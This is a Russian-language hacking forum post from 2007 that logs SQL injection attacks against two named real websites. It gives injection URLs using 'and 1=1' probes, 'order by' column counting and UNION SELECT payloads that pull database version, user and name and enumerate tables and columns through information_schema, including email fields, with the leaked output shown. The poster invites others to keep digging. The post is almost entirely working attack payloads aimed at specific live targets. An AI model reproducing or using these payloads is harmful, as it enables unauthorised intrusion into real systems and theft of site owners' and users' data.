Показать сообщение отдельно

  #10  
Старый 16.12.2007, 19:01
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

http://www.fllandforsale.biz/email_rep.php?id=4/*'
http://www.fllandforsale.biz/email_rep.php?id=4+and+1=1/*'

http://www.fllandforsale.biz/email_rep.php?id=4+order+by+22/*'

http://fllandforsale.biz/searchRegions.php?pType=3/*
http://fllandforsale.biz/searchRegions.php?pType=3+and+1=1/*
http://fllandforsale.biz/searchRegions.php?pType=3+order+by+1/*


http://fllandforsale.biz/showListing.php?type=property&id=348+and+1/*
http://fllandforsale.biz/showListing.php?type=property&id=348+order+by+4/*

http://www.fllandforsale.biz/email_rep.php?id=-4+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,0,11,12,13,14,15,16,17, 18,19,20,21,22
4.1.20::h7t6Y54@localhost::flland

p.s. версия 4-ка и легким брутом таблици не подобрал, читать тоже прав нет

http://www.epdlp.com/clasica.php?id=397+and+1=1/*'
http://www.epdlp.com/clasica.php?id=397+order+by+14/*'
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14/*'

http://www.epdlp.com/clasica.php?id=397+union+select+1,2,concat_ws(0x3a 3a,version(),user(),database()),4,5,6,7,8,9,10,11, 12,13,14/*'
5.0.45::epdlp@208.109.86.144::epdlp



http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_name,column_name)+using+latin1),4 ,5,6,7,8,9,10,11,12,13,14+from+information_schema. columns+where+table_name=''+limit+100,11/*'

clasica::top100
clasica:bra
clasica::nommusico
clasica::apemusico
clasica::fecha

http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_name,column_name)+using+latin1),4 ,5,6,7,8,9,10,11,12,13,14+from+information_schema. columns+where+table_name='clasica'+limit+1,4/*'

texto::apeautor
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_schema,table_name,column_name)+us ing+latin1),4,5,6,7,8,9,10,11,12,13,14+from+inform ation_schema.columns+where+column_name+like+'%mail %'+limit+1,2/*'
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat _ws(0x3a3a,table_schema,table_name,column_name)+us ing+latin1),4,5,6,7,8,9,10,11,12,13,14+from+inform ation_schema.columns+where+table_name='felicitacio nes'/*'

felicitaciones
epdlp::felicitaciones::comentario
epdlp::felicitaciones::ID
epdlp::felicitaciones::anio
epdlp::felicitaciones::mes
epdlp::felicitaciones::fecha
epdlp::felicitaciones::dia
epdlp::felicitaciones::hora
epdlp::felicitaciones::email
epdlp::felicitaciones::contenido

p.s. версия 5-ка таблиц много можете поискать что-то)) /*прав читать файлы нет =\*/
 
Ответить с цитированием